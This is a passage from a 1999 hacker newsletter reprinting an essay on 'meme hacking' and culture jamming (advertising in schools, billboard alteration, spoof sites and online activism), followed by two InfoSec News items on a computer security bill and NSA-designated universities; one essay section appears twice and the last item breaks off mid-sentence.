Media and the Family, based in Minneapolis, which studies the effect of advertising on families. "The effect is the same. It gets at what I call the golden rule of influence, which is when the person being influenced doesn't even know it." Media groups such as Channel One place television news shows into classrooms. As they say on their website, Channel One News is a daily, televised, 10-minute newscast that is beamed via satellite during the school year to each of the 12,000 schools in the Channel One Network community. Channel One News features stories on breaking news and in-depth issues that affect the world, the nation and specifically America's teenagers. Leaving aside the question of advertising in education, an examination of what Channel One considers "news" is revealing. Today's (May 27, 1999) edition asks students how they liked Star Wars, covered Alannis Morisette, commented on body image, and reported "Live from Mt. Everest". The message broadcast to students on Channel One is clear: our culture is defined by the movies and music we see and hear, our culture is the best, and the best path to self-actualization is to immerse ourselves in this culture. Listen to Channel One on freedom in China: Behind the Chinese government's restrictions are cultural and historical factors. For thousands of years, Chinese culture has been based on Confucian values, which people have a respect for authority. The ruler of the people is a father figure whom everyone must obey. The Chinese government's existing authoritarian style of leadership follows the ancient way of emperors who ruled China with "the mandate of Heaven." Individualism is not highly valued in Confucianism. Instead, people are encouraged to act in the best interest of the family and community. The Chinese culture, according to Channel One, is inherently and irredeemable evil, based on authortarian "Confucian" values. Such an account misrepresents both Chinese culture and Confucianism. By contrast, the American culture is painted in pure tones, America was founded by English colonists who wanted independence from Great Britain. The United States also has become a haven for immigrants fleeing religious and ethnic persecution in other countries. Because of these historical events, individualism and freedom is highly valued in American culture. Here we have not only an assumption of genetic and racial purity, we also have a conflation of "freedom" and "individualism". And - leaving aside the fact that the dominant religion in the United States - Christianity - is at least as authoritarian as Confucianism, the 'fact' of freedom in the United States is traced to its religious roots. Advertisers have long known that imprinting is best accomplished though marketing to kids. The battle for the airwaves and print media has been won. The battle for the classrooms of the nations is just being engaged. Hacking Memes 7. The Counteroffensive: Words as Weapons The counteroffensive is being mounted by a variety of forces who - until the advent of the internet - had few means of communication and interaction. The counteroffensive - an anti-cultural diatribe led by pagans and witches, socialists, anarchists and libertarians, webgrrls and riotgrrls, homosexuals and lesbians, environmentalists and consumer advocates - has moved from the trenches of alternative cafes and billboard defacing to the mainstream of online culture. The counteroffensive - now armed with the tools of mass media - is a guerilla operation using the word as weapon, as described by Dery: The answer lies, perhaps, in the "semiological guerrilla warfare" imagined by Umberto Eco. "[T]he receiver of the message seems to have a residual freedom: the freedom to read it in a different way...I am proposing an action to urge the audience to control the message and its multiple possibilities of interpretation," he writes. "[O]ne medium can be employed to communicate a series of opinions on another medium...The universe of Technological Communication would then be patrolled by groups of communications guerrillas, who would restore a critical dimension to passive reception." Or as the Quebec Public interest Research group puts it, We can break the homogeneity of the media monopoly by expressing ourselves with our own media. Taking back our media means taking back our freedom and engaging in a revolution of many minds against a common enemy. Through workshops, panel discussions, and lectures, events such as Liberating Media seek to encourage and inspire participants to take back our media and our freedom in the diversity of forms in which they both exist. The methodology of counterattack involves inserting counter-memes into the media mainstream. It is the idea of the meme conceived as virus taken to its logical extreme. This idea expresses itself even in Dawkin's seminary The Selfish Gene and is operationalized in William S. Burroughs's radical treatise, The Electronic Revolution: The control of the mass media depends on laying down lines of association. When the lines are cut the associational connections are broken. I have frequently spoken of word and image as viruses or as acting as viruses, and this is not an allegorical comparison. You will notice that this process is continually subject to random juxtapostation. Just what sign did you see in the Green Park station as you glanced up from the People? Just who called as you were reading your letter in the Times? What were you reading when your wife broke a dish in the kitchen? An unreal paper world and yet completely real because it is actually happening. The underground press serves as the only effective counter to a growing power and more sophisticated technique used by establishment mass media to falsify, misrepresent, misquote, rule out of consideration as a priori ridiculous or simply ignore and blot out of existence: data, books, discoveries that they consider prejudicial to establishment interest. Consider the human body and nervous system as unscrambling devices. Remember that when the human nervous system unscrambles a scrambled message this will seem to the subject like his very own ideas which just occurred to him. Consider now the human voice as a weapon. To what extent can the unaided human voice duplicate effects that can be done with a tape recorder? Learning to speak with the mouth shut, thus displacing your speech, is fairly easy. You can also learn to speak backwards, which is fairly difficult. I have seen people who can repeat what you are saying after you and finish at the same time. This is a most disconcerting trick, particularly when praciticed on a mass scale at a political rally. Or, as put less eloquently by the Church of the Subgenius: We're the Happy People. Happy to live in a world of images. Images of war. Family. Crime. Fun images, that help rinse away unsightly self-images, so you can get away from the privacy of your own home. After all, aren't you what everything's here for? You're what we're here for. That's why we made everything! That's why everything made you. And that's why you made us. Who are we? Hacking Memes 7. The Counteroffensive: Words as Weapons The counteroffensive is being mounted by a variety of forces who - until the advent of the internet - had few means of communication and interaction. The counteroffensive - an anti-cultural diatribe led by pagans and witches, socialists, anarchists and libertarians, webgrrls and riotgrrls, homosexuals and lesbians, environmentalists and consumer advocates - has moved from the trenches of alternative cafes and billboard defacing to the mainstream of online culture. The counteroffensive - now armed with the tools of mass media - is a guerilla operation using the word as weapon, as described by Dery: The answer lies, perhaps, in the "semiological guerrilla warfare" imagined by Umberto Eco. "[T]he receiver of the message seems to have a residual freedom: the freedom to read it in a different way...I am proposing an action to urge the audience to control the message and its multiple possibilities of interpretation," he writes. "[O]ne medium can be employed to communicate a series of opinions on another medium...The universe of Technological Communication would then be patrolled by groups of communications guerrillas, who would restore a critical dimension to passive reception." Or as the Quebec Public interest Research group puts it, We can break the homogeneity of the media monopoly by expressing ourselves with our own media. Taking back our media means taking back our freedom and engaging in a revolution of many minds against a common enemy. Through workshops, panel discussions, and lectures, events such as Liberating Media seek to encourage and inspire participants to take back our media and our freedom in the diversity of forms in which they both exist. The methodology of counterattack involves inserting counter-memes into the media mainstream. It is the idea of the meme conceived as virus taken to its logical extreme. This idea expresses itself even in Dawkin's seminary The Selfish Gene and is operationalized in William S. Burroughs's radical treatise, The Electronic Revolution: The control of the mass media depends on laying down lines of association. When the lines are cut the associational connections are broken. I have frequently spoken of word and image as viruses or as acting as viruses, and this is not an allegorical comparison. You will notice that this process is continually subject to random juxtapostation. Just what sign did you see in the Green Park station as you glanced up from the People? Just who called as you were reading your letter in the Times? What were you reading when your wife broke a dish in the kitchen? An unreal paper world and yet completely real because it is actually happening. The underground press serves as the only effective counter to a growing power and more sophisticated technique used by establishment mass media to falsify, misrepresent, misquote, rule out of consideration as a priori ridiculous or simply ignore and blot out of existence: data, books, discoveries that they consider prejudicial to establishment interest. Consider the human body and nervous system as unscrambling devices. Remember that when the human nervous system unscrambles a scrambled message this will seem to the subject like his very own ideas which just occurred to him. Consider now the human voice as a weapon. To what extent can the unaided human voice duplicate effects that can be done with a tape recorder? Learning to speak with the mouth shut, thus displacing your speech, is fairly easy. You can also learn to speak backwards, which is fairly difficult. I have seen people who can repeat what you are saying after you and finish at the same time. This is a most disconcerting trick, particularly when praciticed on a mass scale at a political rally. Or, as put less eloquently by the Church of the Subgenius: We're the Happy People. Happy to live in a world of images. Images of war. Family. Crime. Fun images, that help rinse away unsightly self-images, so you can get away from the privacy of your own home. After all, aren't you what everything's here for? You're what we're here for. That's why we made everything! That's why everything made you. And that's why you made us. Who are we? Hacking Memes 8. Humble Beginnings Forget the names Jerry Rubin and Abbie Hoffman. The prima donna of underground radicalism is probably Saul Alinsky, whose anti-establishment and over-the-top forms of guerilla media propelled a wide variety of alternative causes into 60s mainstream. As one Amazon reviewer writes, Mr. Alinsky captures the outrage organizers have with the status quo. 'Why organize?' is the central question that permeates throughout this book, and Mr. Alinsky answers this question with a scathing attack on the powers that be, who are beholden to maintaining the status quo. Mr. Alinsky allows the reader to not just dream of a better America but doles out powerful, practical methods to either; A. work within the current system to effect positive change, or B. bring the system to its knees in the quest toward positive change. An absolute must read for anyone wishing to take on the status quo of poverty, injustice, hatred, and discrimination. If Alinsky had one major rule (other than "shock them") it was: "use their own rules against them". Consequently, Alinsky followers employed such radical tools as the court system, community newspapers, and town hall meetings. Early meme hackers in the Alinsky mold modified that advice only slightly: use their own words against them. Thus, for example, the Billboard Liberation Front modified public advertising to give common messages a slightly different - and twisted - meaning. Beginning in 1977 (by dropping the "M" in "Max Factor they highlighted the disturbing undertones in that company's slogan, "A pretty face isn't safe in this city") the BLF conducted a series of highly visible alterations in the San Francisco Bay area. The BLF was followed by many others, for example, POPaganda (Ron English). As the Apocalyptic Optimism for the End of History (Abrupt) puts it, Culture Jamming" sticks where rational discourse slides off. It is, simply, the viral introduction of radical ideas. It is viral in that it uses the enemy's own resources to replicate iteself -- copy machines, defaced billboards, web pages. It is radical because--ideally--the message, once deciphered, causes damage to blind belief. Fake ads, fake newspaper articles, parodies, pastiche. The best CJ is totally unexpected, surprising, shocking in its implications. In a similar vein, Team Seven practised a series of renegade construction activities, recommending for example to its readers that they raise a flag of your their design at their local bank after it has closed for the day, or that they set up a reading area at a predefined other-useage area, such as a car wash or highway media. The Survival Research Laboratories in San Francisco adopt a more artistic format: Since its inception SRL has operated as an organization of creative technicians dedicated to re-directing the techniques, tools, and tenets of industry, science, and the military away from their typical manifestations in practicality, product or warfare. Since 1979, SRL has staged over 45 mechanized presentations in the United States and Europe. Each performance consists of a unique set of ritualized interactions between machines, robots, and special effects devices, employed in developing themes of socio-political satire. Humans are present only as audience or operators. Meme hacking was limited by technology in the early days. Even Dery could only identify four major categories: Sniping and Subvertising (eg. Adbusters) Media Hoaxing - Joey Skaggs Audio Agitprop - eg. Sucking Chest Wound, whose God Family Country ponders mobthink and media bias; The Disposable Heroes of Hiphoprisy, who take aim in "Television, the Drug of the Nation Billboard Banditry - eg. Billboard Liberation Front Adbusters is a Vancouver based anti-advertising magazine. It is perhaps best known for Buy Nothing Day and TV Turn-Off Week campaigns. In addition to the monthly magazine, Adbusters attempts to run anti-consumerism advertisements on mainstream television. The response from the networks is usually negative; Adbuster's messages are labled "controversial" and banned. Its most recent campaign, is Economic Progress Killing the Planet - planned for airing during the G-7 conference in Germany, was rejected by the British Advertising Clearance Council as unacceptable. A similar agency is The Centre for Media and Democracy, which focusses not just on advertising, but on public relations generally. As the agency's web site states, Unlike advertising, public relations is often hard to recognize. "The best PR is invisible," say industry insiders. To spin the news in favor of their clients, PR firms specialize in setting up phony citizens' groups and scientific "experts" who spin out contrived research using junk science. The Centre's main vehicle, like Adbusters, is a quarterly magazine, PR Watch, and they have released two books, Toxic Sludge Is Good For You: Lies, Damn Lies and the Public Relations Industry (1995) and Mad Cow USA: Could the Nightmare Happen Here? (1999). The term Culture Jamming has its origins in the audio agitprop arena, and specifically, with an experimental-music and art collective known as Negativeland. They write on their website, Advertising, especially the high tech seduction and emotional button pushing going on in national brand advertising, has become a special subject of interest for Negativland because of its telling view into the successful manipulation of the mass psyche, and the degree to which it exploits our common mental environment with the promotion of personal dissatisfaction and constant desire mongering on a universal scale. Other anti-meme artists include The Seemen, "a collaborative of some forty odd art drop outs and extreme technology inventors who enjoy exploring their taste for the dark side of applied engineering in robot/kinetic art," and the Cacophony Society, including the The Los Angeles Cacophony Society and Cacophony Midwest, which recently launched the First Annual St. Louis Santa Rampage. "The Cacophony Society is an open network of creative malcontents, guerrilla artists, slackers, hooligans, kitsch-hounds, and anyone else interested in subverting primetime reality. You may already be a member!" Hacking Memes 9. Electronic Warfare The meme hackers of the 70s and 80s were marginalized. Their reach was limited, and social commentary following their acts (and subsequent arrests) was uniformly negative. Society as a whole - so it seemed - branded them as vandals and anarchists, radicals and communists. With the advent of the internet in the late 80s and early 90s, meme hacking was given a new life. While their access to mainstream media was still limited, activists could now communicate with each other in rapid, free and uncensored messages. moreover, the internet - and especially the world wide web - gave them a means of reaching directly into the mainstream consciousness, bypassing the media altogether. Early electronic meme hacking consisted of two major tactics: slashing, and spamming. Slashing is the appropriation of an existing meme for subcultural purposes. The term "slashing" derives from pornographic "K/S" - short for "Kirk/Spock" - stories written by Star Trek fans and published in underground fanzines. The theme unifying such stories is Kirk and Spock's long homosexual affair - an affair only alluded to in the on-air version of the series. The development of 'fan fiction' in general - and more recently, fanzines, fan web sites, and fan discussion boards - has had the effect of removing control of the 'product' from the corporate studio and into the hands of the general public. Star Trek, in particular, has been the subject of hundreds of fan pages, and when Paramount attempted to crack down on the sites (in order to promote its Microsoft-only version), fans rebelled. The first subversive spam was probably Joe Matheny's deluge of ascii frogs sent to the White House (in return for which, he received in good order a deluge of automated reply messages). Matheny quickly wrote a shell program to filter the auto-replies and return them to their sender, which set up an email loop. With the advent of its abuse by more corporate interests (ZDNet and Xoom take note), spamming has declined as a weapon of choice, revealing as it does a general disregard for its recipients needs and interests. An image - Eduardo Kac led things off with a slide presentation demonstrating how the Web can become a life source. During his experiment in 1996, people worldwide where asked to join a teleconference, anytime during a three week period. The participants simply aimed their cameras to the heavens so that light on the other end of their transmission could be used to grow a freshly planted seed, which had been isolated in total darkness. Through the nourishment of the white lights, the seedling grew to 18" in height and was later planted outside the Art Institute of Chicago. The central question of electronic counterculture revolves around media itself: who owns it, who controls it, and who uses it. As Jesse Hirsh writes, "We need to examine the right to communicate, and the communication of our rights." Dery echoes this theme: Who will have access to this cornucopia of information, and on what terms? Will fiber-optic superhighways make stored knowledge universally available, in the tradition of the public library, or will they merely facilitate psychological carpet bombing designed to soften up consumer defenses? And what of the network news? Will it be superseded by local broadcasts, with their heartwarming (always "heartwarming") tales of rescued puppies and shocking (always "shocking") stories of senseless mayhem, mortared together with airhead banter? Or will the Big Three give way to innumerable news channels, each a conduit for information about global, national and local events germane to a specific demographic? Will cyberpunk telejournalists equipped with Hi-8 video cameras, digital scanners, and PC-based editing facilities hack their way into legitimate broadcasts? Or will they, in a medium of almost infinite bandwidth and channels beyond count, simply be given their own airtime? In short, will the electronic frontier be wormholed with "temporary autonomous zones"---Hakim Bey's term for pirate utopias, centrifuges in which social gravity is artificially suspended---or will it be subdivided and overdeveloped by what cultural critic Andrew Ross calls "the military-industrial-media complex?" The answer lies in the nature of the internet. Everybody will have access to information. The very nature of cyberspace is that it is interpersonal and multidirectional. There is no control and - despite the best efforts of the censors - there is no overseer. We see for the first time the elements of mainstream media on the retreat, trying to legislate, trying to litigate, trying to appropriate. But as the nature of cyberspace is communication such efforts will be in vain, for communication is deeply personal, exactly the opposite of the mass media message. We see this through concrete examples of anti-meme activities on the net. Hacking Memes 10. The Network The internet is about community. This is a realization corporate culture realized too late. The recent received wisdom of electronic commerce is that to be successful, online advertising must foster the development of community. But the countercultural community is already well established and well entrenched. Entities such as San Francisco's Laughing Squid have been using the internet to advertise their monthly countercultural 'tentacle sessions' for years now. Alternative 'religions' - such as the Church of the SubGenius congregate online and poke fun at mainstream values and culture. Organizations such as the The center for Commercial-Free Public Education use the internet to post messages, coordinate activist campaigns, and spread information. Activists are able to publicize to each other the effects of their anti-meme activities, as for example, this post describes the subversion of a political campaign: Two weeks ago there was a story that made the headlines in the newspaper and Compass (PEI's Evening News). The story was that a pamphlet had been distributed in the riding of Barry Hicken, our Minister of Environmental Resources. The pamphlet was made to look like a campaign pamphlet, with pictures of Hicken and the Liberal Party logo. It stated things like: -My job has as Minister of Environmental Resources has been very rewarding. I make over $74,000 a year. My wife still can't believe it. Please, please, please vote for me. I'll get you a job. I promise. Agencies such as Tao "organize networks in order to defend and expand public space and the right to self-determination. (They) create knowledge through independent public interest research, and distribute it freely through participatory education." Other sites advise and promote subversive activities. The network is well entrenched and it's growing; there seems to be no interrupting the flow of communication. Online activism also enable people to shelter themselves from the mainstream culture. One recent tactic is called junk busting, which involves using proxy software to filter banners, cookies, and mask HTTP header data. A similar initiative attacks Intel and especially Intel's PSN (Processor Serial Number). And the fictional identity of Luther Bissett - complete with web site and email address - has been offered to the community at large for "communication guerrilla actions, hacktivism, civil disobedience (electronic and not) and radical mythopoesis." Hacking Memes 11. Web Ad Jamming and Spoof Sites A wide array of anti-advertsing sites, home page spoofs, and more express more clearly than any words the sentiments of the anti-meme movement. Spoof sites have probably existed since the advent of the World Wide Web, but in recent months their profile - and the litigation against them - has increased. The dean of corporate spoof sites is probably ®TMark (pronounced 'Art Mark'). Originally an secretive and underground agency, ®TMark has entered the public arena. ®TMark is the behind the scenes broker of anti-meme mayhem. Projects are suggested by readers and staff, anonymous donors line up to fund different projects, and teams of activists carry out the plan. ®TMark prenks have included switching the voice boxes in G.I. Joe and Barbie dolls, inserting homosexual couples in Sim Copter Graphics, and online, a scathing spoof site for Shell Oil, and most recently, a lavish G.W. Bush parody site. Corporate sites in general are ripe for spoof and parody. Happyclown, Inc. is an exciting firm devoted to using a fresh and new approach to Corporate Communications; This young, modern and progressive Public Relations venture will make the aesthetic sensibilities of the New Generation available for the use of the familiar and trusted institutions of the Old Generation. It is also several other things.... Hole City presents the reader with a sideways look at media moguls. "It's a tremendous angle," says Rupert Murdoch, the media magnate whose fiery alliance with Satan has brought him fame, fortune and the Los Angeles Dodgers. "Our demographics indicate that Americans respond positively 53% of the time when we tell them the truth." Other anti-corporate sites include Critical Mess Media (CMM), Mess Media's DisConnection (DisCo), and ZNet Anarchy Watch. A variation on this theme includes what the Culture Jammer's Enclyclopedia calls News Trolls: If there's one thing that the left and the right can agree on, it's that the news is inaccurate, biased, and is more likely to cement popular prejudice than to uncover uncomfortable truths. So there's a certain satisfaction in deliberately planting absurd fiction among all the news that's fit. Examples of fiction include the Arm the Homeless campaign, a computer that can replace judges, and the phoney Detroit gang incident. In Canada, underground tactics are employed by the Gurilla media - "media monkeywrenching for British Columbia, Canada" - purveyors of the National Post parody site and the Conrad Black Envy page: Finally! A website for all of us who are profoundly envious of the Blacks-- Conrad and Barbara-- commanders-in-chief of the world's fastest growing press empire. This site is but a humble attempt to celebrate the Blacks' words and world: their unpretentious persiflage, personal pecuniary plentitude, pertinacious pedantry, proprietorial parsimony, perspicacious pomposity, and polymorphous periphrastic preeminence. These and more patently false news sites cause some people to warn that "you can't trust everything you read on the internet". But their subversion is deeper - they inform the public that "you can't trust everything you read". No wonder news agencies and academics want to create "authoritative" web news sources. Another popular tactic reacts to the increasing commericalization of the web. A number of sites are creating and propogating spoof web ads. Such ads are meme hacking at its best - they lay generally ignored (check the top of this page) silently spreading subversion. Spoof web ads are available on Positive Propaganda's unsorted banner page, from Chickenhead, Stay Free! Magazine, Abrupt's Holy War Now by 'Tony Alamo', and The Corporation's twisted children's companion, Cyberbear. Hacking Memes 12. The Anti-Meme The anti-meme is probably typified by the Kitty Porn site. The idea is to take an existing meme, alter it, and thus show its unreasonable or arbitrary nature. This is not a new idea - it was practised to great effect by the German philosopher Friedrich Nietzsche ("the transvaluation of value"). But online, such anti-memes are able for the first time to gain wide currency. Consider the spoof Alien Visitors Information Centre. This travelogue site makes fun of Chamber-of-Commerce inspired tourist brochures. But there is a deeper transvaluation: Kurt Waldheim is one of the large, hairy, upright-walking beasts selected as their leader though the recent United Nations model for better campground management. As U.N. secretary-general, Waldheim's personal greetings were launched in Voyagers 1 and 2, travelling AVIC kiosks in space which also carry the sounds of chimpanzees screeching. When we made those decisions, the management did not know Mr. Waldheim helped murder thousands of fellow humans during something significant called World War II. The employees who were responsible have been sacked. The AVIC makes the very simple point that our contemporary culture is still capable of electing mass-murderers as world leaders, a fact verified by the many ongoing conflicts and genocides today. The anti-meme highlights the absurdity and even the moral decay of the mass-media meme: Our society spends a lot of time telling us that there is some brand new, fresh cultural produce, generated from thin air and sunshine, slick and clean. They package it with pretty plastic & ribbons and then feed it to us. A lot gets thrown away: the ribbons, the wrapping; culture becomes garbage, or it dies, and rots behind the refrigerator. But the new fluffy shiny stuff still gets churned out, and it gets forced between our teeth. And we are told to swallow it. We will not swallow. We will chew, and then spit. We will play with our food, and create something new and interesting from it. This is similar to the Adbusters "Is Economic Progress Killing Our planet" campaign, and a host of other messages pointing to the waste and absurdity of the economic order as it exists today. The idea is to show that the sanitary culture presented in mass culture isn't the sanitary and stain-free entity the messages proclaim it to be. "The possibility of adding pimples to the retouched photo of the face on the cover of America are only now being seen as artistic territory." The anti-message is very simple: this is not good. Corporate and cultural abuses are legion, from the Exxon Valdiz oil spill to the Union Carbide poisoning of tens of thousands of people in Bhopal, India. Yet criticism is mute. As the Overcoming Consumerism site observes, The often asked question, "why doesn't the media talk about corporate power?" and the frequent answer "because the corporations own the media...", really is a simplification of a wide-ranging process of power-sharing and wealth-retention that goes more to the kinds of people behind the corporations than the actual corporations themself. The anti-meme is an attack not only on corporate and government policies and practises, but also on the media messages themselves. Hence, for example, we see sites such as White Dot, which ask, "What do you do if you don't watch TV?" References Adbusters. Agency Website. http://adbusters.org Adbusters. is Economic Progress Killing the Planet. Media campaign. 1999. http://adbusters.org/progress/progress.html Adbusters. Brits miss out on G8 Summit message. Press Release. 1999 http://www.adbusters.org/campaigns/economic-pressrelease.html Advertising Age. Corporate Web Site. http://www.adage.com/ Alinsky, Saul. Titles, listed at Amazon.com. http://www.amazon.com/exec/obidos/Author%3DAlinsky%2C%20Saul%20D. /thecenterformediA/002-3999677-2858208 Apocalyptic Optimism for the End of History. Culture Jamming. Web Site. http://www.abrupt.org/CJ/CJ.html Baffler, The. Commodify your dissent. Magazine - counterculture ideas and opinions. Purchase from http://www.dustygroove.com/baffler.htm Home site at http://www.thebaffler.org/ Baumgertner, Peter, and Payr, Sabine. Learning as Action: A Social Science Approach to the Evaluation of Interactive Media. CSS Journal Volume 5 Number 2 - March/April, 1997. http://www.webcom.com/journal/baumgart.html Bennahum, David. Meme. Mailing List Web Site. http://memex.org/welcome.html Bennahum, David. Meme definition. http://www.ed.cqu.edu.au/~bigumc/Meme/meme_definition.html Big Brother Inside. Web Site. http://www.bigbrotherinside.com/ Billboard Liberation Front. Agency Web Site. http://www.billboardliberation.com Bissett, Luther. 'Personal' home page. http://www.syntac.net/lutherblissett/ Bourroughs, William S. The Electronic Revolution. http://www.syntac.net/dl/elerev2.html Brooks, Meredith. Bitch. 1998. Columbia Records. http://hollywoodandvine.com/starlandmotel/media/ram/video/ meredithbrooks-bitch.ram First Annual St. Louis Santa Rampage. Web Site. http://home.postnet.com/~cacophony/santa.htm Canadian Broadcasting Corporation. Corporate Web Site. http://www.cbc.ca Centre for Media and Democracy. Agency Web Site. http://www.prwatch.org/ Channel One Corporate Web Site. http://www.channelone.com Chickenhead. Zine. http://www.chickenhead.com CHUM Media Group. Corporate Web Site. http://www.chum.com Church of the SubGenius. Home Page. http://www.subgenius.com/ Church of the SubGenius. We're the Happy People. http://www.subgenius.com/bigfist/ answers/rants/ad/ad.html Corcoran, Terence. Attack of the tomato killers. National Post, May 4, 1999. http://www.nationalpost.com/financialpost.asp?s2=opinion&s3= theeditor&f=990504/2555310.html Corporation, The. Parody. http://www.thecorporation.com/ Corporation, The. Cyberbear. Parody. http://www.thecorporation.com/ runninggags/cyberbear/index.html Critical Mess Media (CMM). Parody site. http://www.rootmedia.org/~messmedia/ Dawkins, Richard. The Selfish Gene. 1976. Book site with excerpts. http://www.spacelab.net/~catalj/selfpage.htm Dery, Mark. Culture Jamming: Hacking, Slashing and Sniping at the Empire of Signs. http://web.nwe.ufl.edu/~mlaffey/cultcover.html Detritus.net. Zine. Home Page. http://www.detritus.net/ English, Ron. POPaganda: Illegal Billboards. Web Site. http://www.popaganda.com/Billboards/body_billboards.html Ewan, Stewart Ewan PR! A Social Theory of Spin. Book Site. http://www.bway.net/~drstu/ Fisher, Ebon. The Alula Dimension. Web Art. Be patient - dig through it. http://www.users.interport.net/~outpost/ebon.html Fisher, Ebon. Mess up your neighbours: The Weird Thing Zone http://www.users.interport.net/~alula/weirdzone.html Garton, Andrew. Breaking the Loop: A spoken word / performance lecture. Based on the Internet/radio installation, Sensorium Connect. satellite Dispatch - Acustica - 2.01 http://www.toysatellite.com.au/news/acustica/201/01.html Grytting, Wayne. Top NEWSPEAK Stories of the Month #113. Student Activists' Network. May, 1999. http://san.tao.ca/san01800.html Gurilla Media. Home Page. http://www.guerrillamedia.org/ Gurilla Media. National Post parody site. Parody. http://www.national-post.8m.com/ Gurilla Media. Conrad Black Envy. Parody. http://www.blackenvy.com/ habitat2@cycor.ca culture jamming before the polls in PEI! Sat, 9 Nov 1996. http://www.tao.ca/earth/media-l/old/1/0051.html Hacker's Dictionary, The. Meme http://www.elsewhere.org/jargon/jargon_28.html#TAG1126 Happyclown, Inc. Parody site. http://www.happyclown.com/mainmenu.html Hays, Constance L. Math Textbook Salted With Brand Names Raises New Alarm. NY Times, March 21, 1999. http://metalab.unc.edu/stayfree/public/math_texts.html Headspace. How to make Trouble and Influence - C is for Culture Jamming. Headspace Issue #4. http://www.abc.net.au/arts/headspace/rn/bbing/trouble/c.htm Henderson, Rich. Interview with Joe Matheny. Undated. Hirsh, Jesse. Culture Jamming: Democracy Now Campus Life 114, November 11, 1998. http://www.campuslife.utoronto.ca/groups/varsity/archives/118/nov11/ feature/culture.html Idiosyntactix Arts and Sciences Alliance. Home Page. http://www.syntac.net/ Idiosyntactix. Culture-Jammer's Enclyclopedia. http://www.syntac.net/hoax/index.html JunkBusters. Home Page. http://www.junkbusters.com/ Karrera, Adam. Virtual Slap: A Keynote Presentation Web Review, June 23, 1998 http://webreview.com/wr/pub/web98/tues/keynote.html Klatte, Arline. "Hey Gang, Let's Put On A Show" Survival Research Labs up against it...again SF Gate, July 6, 1998 http://www.sfgate.com/cgi-bin/article.cgi?file=/technology/archive/ 1998/07/06/srl.dtl Lane, Randall. You are what you wear. Forbes, May 26, 1999. http://www.forbes.com/forbes/101496/5809042a.htm Laughing squid. Home Page. http://www.laughingsquid.com/ McDonalds. Corporate Web Site. http://www.mcdonalds.com McLaren, Carrie. Review of the Baffler Issue 5. 1999? http://metalab.unc.edu/pub/electronic-publications/ stay-free/7/baffler.htm Mclaren, Carrie. Advertising the Uncommercial. Matador, Issue #6 - 1999? Messmedia. DisConnection (DisCo). Parody site. http://messmedia.rootmedia.org/disconnection/ National Post. The National Post. Corporate Web Site. http://www.nationalpost.com Negativeland. Negativeworldwidewebland. Band Web Site. http://www.negativland.com/ Nike. Corporate Web Site. http://www.nike.com Overcoming Consumerism. Web Site. http://www.hooked.net/users/verdant/index.htm Positive Propaganda. Unsorted Banners. Ad Parodies. http://www.honeylocust.com/positive/unsort.html Practical Magic. Movie Web Site. 1998. Warner Brothers. http://www.practicalmagic.com Public Broadcasting System. Corporate Web Site. http://www.pbs.org Principia Cybernetica Web. Memetics. http://pespmc1.vub.ac.be/memes.html Quebec Public Interest Research Group Liberating Media: a weekend of culture jamming, media, and community democracy. 1997. http://www.tao.ca/earth/toronto/archive/1997/toronto00100.html Reebok. Corporate Web Site. http://www.reebok.com ®TMark. Home Page. http://www.rtmark.com ®TMark. Full Projects List. http://www.rtmark.com/listallprojects.html ®TMark. Shell. (Note - often not listed by DNS Servers - go figure) http://shell.rtmark.com ®TMark. G.W.Bush.com http://www.gwbush.com saggau@earthlink.net Review of Rules for Radicals. Amazon.com, December 29, 1998. http://www.amazon.com/exec/obidos/ASIN/0679721134/ 002-3999677-2858208 Seemen, The. Society web site. http://www.seemen.org Sippey, Michael. Live or Memorex?. The Obvious, December 12, 1996. http://www.theobvious.com/archives/021296.html Stay Free! Magazine. Home Page. http://metalab.unc.edu/stayfree/ Stay Free! Issue #13 marketing to Kids. Zine. http://metalab.unc.edu/stayfree/13/index.html Stay Free! Issue #14 Interview with Stewart Ewan. Zine. http://metalab.unc.edu/stayfree/14/ewen1.html Tao. Home Page. http://www.tao.ca Turner, John. Where Will They Strike Next?. Shift 7.3, May, 1999. http://www.shift.com/shiftstd/html/onlineTOC/1999/7.3/ html/ArtMark1.html Vanatta, Rob. Meredith Brooks Net. Fan Site. 1997, 1998. http://web.csuchico.edu/~rvanatta/mbrooks/ Whalen, John. The Mayhem is the Message Metroactive Cyberscape - 1995. http://www.metroactive.com/cyber/jamming.html White Dot. Web Site. http://www.whitedot.org/welikeit.html Woolley, Wayne. Florida reporter falls for phony Detroit gang hoax on Internet The Detroit News, December 6, 1996. http://detnews.com/cyberia/culture/961206/hoax/hoax.htm ZNet. Anarchy Watch. Web Site. http://www.zmag.org/AWatch/awatch.htm Email Stephen Downes at downes@newstrolls.com copyright newstrolls.com 1999 all rights reserved! @HWA 29.0 [ISN] House panel aims to bolster security law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 21 May 1999 00:58:50 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] House panel aims to bolster security law Forwarded From: William Knowles http://www.fcw.com/pubs/fcw/1999/0517/web-security-5-20-99.html House panel aims to bolster security law (Federal Computer Week) [5.20.99] WASHINGTON, D.C. -- The House Science Committee plans to make another push to update a 1989 law that requires civilian agencies to take measures to protect their computer systems, according to Rep. Constance Morella (R-Md.), chairwoman of the Technology Subcommittee of the House Science Committee. The new bill, which could be introduced as early as next week, would revamp the 10-year-old Computer Security Act. The bill will closely resemble the Computer Security Enhancement Act of 1997, which the House passed only to have it die in the Senate last year, said Morella, speaking at a symposium sponsored by the SmartCard Forum. Like the 1997 bill, the proposed legislation would tap the National Institute of Standards and Technology as the lead agency for information security. The preceding bill also would have required NIST to promote federal use of commercial off-the-shelf products for civilian security needs. The committee first began its effort to revamp the existing law to reflect the proliferation of network technology that has left agency data more vulnerable to corruption and theft, Morella said in 1997. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 30.0 [ISN] NSA Taps Universities For Info Security Studies ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 21 May 1999 01:13:40 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] NSA Taps Universities For Info Security Studies Forwarded From: SpyKing@con2.com NSA Taps Universities For Info Security Studies The National Security Agency has designated seven U.S. universities as centers for information-security education, the agency said Tuesday. The NSA, a super-secret spy agency that wields broad power over U.S. encryption policy, named two private Virginia universities and a handful of state universities as Centers of Academic Excellence in Information Assurance Education. They are: James Madison University, George Mason University, Idaho State University, Iowa State University, Purdue University, University of California at Davis, and the University of Idaho.The centers are expected to become "focal points for recruiting, and may create a climate to encourage independent research in information 